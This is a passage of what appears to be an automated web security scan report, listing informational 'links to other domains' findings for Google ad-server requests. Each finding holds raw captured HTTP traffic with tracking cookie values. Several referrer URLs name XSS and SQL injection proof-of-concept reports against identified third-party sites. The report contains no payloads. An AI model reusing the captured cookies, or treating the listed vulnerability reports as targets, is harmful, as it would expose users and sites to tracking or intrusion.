Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 15:24:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4359

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/xss-sqlinjection-httpinjection-ghdb-weak-configuration-vulnerable-hosts.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG9TeY7FH4jUIGduhO00M66zqQm6g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.37. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303756505&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303738505554&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303738505788&frm=0&adk=1819763764&ga_vid=413277210.1303738506&ga_sid=1303738506&ga_hid=678088752&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&eid=44901217%2C33895132&fu=0&ifi=1&dtd=331&xpc=ckA4kh6DtR&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:34:56 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26gl%3DUS&amp;usg=AFQjCNHo7HQbxZHgN90066UkdYLmA9HNiA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.38. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303768844&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fdmcacom%2Freflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-ghdb-example-poc-report.html&dt=1303750865555&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303750865561&frm=0&adk=1607234649&ga_vid=2141594666.1303750866&ga_sid=1303750866&ga_hid=1546514975&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=10&xpc=vpCEF5w8Cz&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 17:00:54 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13551

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/dmcacom/reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DCymphonix.com/Application%252BSecurity%26adT%3DApplication%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BNetwork%2BSecurity%26gl%3DUS&amp;usg=AFQjCNGDpmBODxC1DFN7espYk5lRcROrRA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.39. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1645

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D"></script>
...[SNIP]...
23.40. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303788022&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fblind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm&dt=1303770026022&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303770027065&frm=0&adk=1819763764&ga_vid=798343758.1303770027&ga_sid=1303770027&ga_hid=1236247844&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1208&bih=981&eid=33895130&fu=0&ifi=1&dtd=1283&xpc=NEEy97LRk5&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/25/dork/blind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 22:20:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13391

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/blind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.datadirect.com/ODBC%26adT%3DODBC%2BDrivers%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BDatabase%2BServer%26gl%3DUS&amp;usg=AFQjCNFR9dh0gfQj_4Jhw09Xuon40KyDQw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.41. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303757147&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html&dt=1303739163288&bpp=11&shv=r20110420&jsv=r20110415&correlator=1303739164172&frm=0&adk=1607234649&ga_vid=332023737.1303739165&ga_sid=1303739165&ga_hid=1647371635&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&eid=36815001&fu=0&ifi=1&dtd=1342&xpc=elXzaM1u1f&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:45:54 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12633

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dsupermicro.com/CloudServerChassis%26adT%3D2.5%2526quot%253B%2BHDD%2BServer%26adU%3Dvulnerability.management.qualys.com%26adT%3DVulnerability%2BManagement%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26gl%3DUS&amp;usg=AFQjCNFpCuEJSWNoPv_4EJdAl1_HAAJEkg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.42. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758810&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fhourlydeploycom%2Fcoldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html&dt=1303740840638&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740840732&frm=0&adk=1607234649&ga_vid=583291703.1303740841&ga_sid=1303740841&ga_hid=96684719&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=177&xpc=h1TVqbQmCu&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:13:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13110

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/hourlydeploycom/coldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Webmetrics.com%26adT%3DApache%2BMonitoring%26adU%3DManageEngine.com/EventLogAnalyzer%26adT%3Dproxy%2Bserver%2Blog%26adU%3Dwww.splunk.com/ITSearch%26adT%3DFree%2BLog%2BFile%2BAnalyzer%26gl%3DUS&amp;usg=AFQjCNFdcLnzYw3uVzfB6d7Ul06hcfPw3g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.43. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=2240541906&w=160&lmt=1303759229&flash=10.2.154&url=http%3A%2F%2Fpogoda.webalta.ru%2F&dt=1303741229140&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303741229174&frm=0&adk=618464972&ga_vid=2128179421.1303741229&ga_sid=1303741229&ga_hid=1489066141&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=929&fu=0&ifi=1&dtd=45&xpc=CrphvdTDRQ&p=http%3A//pogoda.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10041

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pogoda.webalta.ru/%26hl%3Den%26client%3Dca-pub-1134822682510879%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.MichelinMan.com%26adT%3DWeather%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dwww.protegrity.com%26adT%3DSecure%2BSensitive%2BData%26adU%3Dwww.consumer-classactions.com%26adT%3DGot%2Ba%2BData%2BBreach%2BEmail%253F%26gl%3DUS&amp;usg=AFQjCNGoC4xgk7-X1pEoKp7smEywYGybIg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
23.44. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303788589&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fblind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm&dt=1303770607993&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303770608060&frm=0&adk=1819763764&ga_vid=1890484408.1303770609&ga_sid=1303770609&ga_hid=31788494&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1192&bih=981&fu=0&ifi=1&dtd=1389&xpc=ZAtbWh8LmR&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 22:29:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12431

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/blind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DPCI%2Basv%2Bscanning%26adU%3Dwww.Confio.com/Ignite8%26adT%3DSQL%2BServer%2BQuery%2BTool%26adU%3Dwww.idera.com%26adT%3DFree%2BSQL%2BServer%2BTools%26gl%3DUS&amp;usg=AFQjCNEHuGE4BbVhiKdU5rBDacU6wya6sA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.45. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
